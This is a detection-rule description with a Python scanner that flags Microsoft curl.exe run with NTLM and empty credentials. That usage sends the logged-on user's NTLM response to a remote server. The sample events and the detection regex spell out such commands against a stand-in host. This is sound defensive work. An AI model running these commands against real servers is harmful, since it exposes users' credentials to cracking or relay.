
Summary
Detects the use of the Microsoft-supplied curl.exe with NTLM authentication and empty credentials (-u :) during Windows process creation. When no credentials are supplied, curl's SSPI integration authenticates with the current user's logon session credentials held in LSASS, so the NTLMv2 challenge/response can be sent to a remote server. This behaviour is specific to the curl binary shipped by Microsoft (Windows 10 / Windows Server 2019+), which is built with SSPI support.

The rule fires when all three conditions hold on one process creation event: (1) the process is curl.exe (Image path ends with \curl.exe or OriginalFileName is curl.exe), (2) the CommandLine contains --ntlm, and (3) the CommandLine contains the empty-credentials indicator (-u:). This combination can enable offline cracking or relay attacks against the current user's credentials.
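The three conditions above, implemented as a small scanner over process creation events so the rule's coverage and gaps can be checked against sample data. This is an added example, not the rule's own query or code from its author: it assumes Sysmon-style field names (Image, OriginalFileName, CommandLine, User), uses constructed events rather than real telemetry, and goes slightly beyond the rule as written by also accepting curl's long form --user for the empty-credentials check.

```python
import re
from typing import Dict, Iterable, List

# Constructed sample process creation events (not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # 0: Microsoft curl, NTLM, empty creds with a space -> match
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "User": r"CORP\alice", "CommandLine": "curl.exe --ntlm -u : http://host.example/share"},
    # 1: same, compact "-u:" form -> match
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "User": r"CORP\alice", "CommandLine": "curl.exe --ntlm -u: http://host.example/share"},
    # 2: renamed copy of the binary; caught via OriginalFileName -> match
    {"Image": r"C:\Users\alice\AppData\Local\Temp\c.exe", "OriginalFileName": "curl.exe",
     "User": r"CORP\alice", "CommandLine": "c.exe --ntlm -u: http://host.example/"},
    # 3: explicit credentials given; SSPI does not use the logon session -> no match
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "User": r"CORP\alice", "CommandLine": "curl.exe --ntlm -u alice:S3cret http://host.example/"},
    # 4: empty creds but no --ntlm -> no match for this rule
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "User": r"CORP\alice", "CommandLine": "curl.exe -u : http://host.example/"},
    # 5: shell launching curl; only the child curl.exe event would match -> no match here
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "User": r"CORP\alice", "CommandLine": 'cmd.exe /c "curl --ntlm -u : http://host.example/"'},
]

# "-u :" or "-u:" as a standalone token (also "--user :", an assumed extension of the rule).
# The lookahead keeps "-u alice:S3cret" and "-u :password" from matching.
EMPTY_CREDS_RE = re.compile(r"(?:^|\s)(?:-u|--user)\s*:(?=\s|$)")


def is_curl_image(event: Dict[str, str]) -> bool:
    """Condition 1: Image path ends with \\curl.exe or OriginalFileName is curl.exe."""
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    return image.endswith("\\curl.exe") or original == "curl.exe"


def has_ntlm_flag(command_line: str) -> bool:
    """Condition 2: CommandLine contains --ntlm (case-insensitive, like a Sigma 'contains')."""
    return "--ntlm" in command_line.lower()


def has_empty_credentials(command_line: str) -> bool:
    """Condition 3: CommandLine carries an empty -u/--user credential token."""
    return EMPTY_CREDS_RE.search(command_line) is not None


def matches_rule(event: Dict[str, str]) -> bool:
    """All three conditions must hold on the same event."""
    cmd = event.get("CommandLine", "")
    return is_curl_image(event) and has_ntlm_flag(cmd) and has_empty_credentials(cmd)


def triage_fields(event: Dict[str, str]) -> Dict[str, str]:
    """Fields an analyst wants first: whose logon session is exposed and to which server."""
    cmd = event.get("CommandLine", "")
    targets = [t for t in cmd.split() if t.lower().startswith(("http://", "https://"))]
    return {
        "user": event.get("User", ""),
        "image": event.get("Image", ""),
        "target": targets[0] if targets else "",
    }


def scan(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return triage summaries for every event that matches the rule."""
    return [triage_fields(e) for e in events if matches_rule(e)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Event 5 is the practical caveat: when curl is launched from a shell the detection depends on the child process creation event for curl.exe being logged, so the rule offers nothing if only the parent cmd.exe event is collected. Event 3 shows why the empty-credentials regex is anchored to a bare ":" token rather than a plain substring search.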
Categories
- Windows
- Endpoint
- Application
Data Sources
- Image
- Process
- Command
- File
Created: 2026-06-04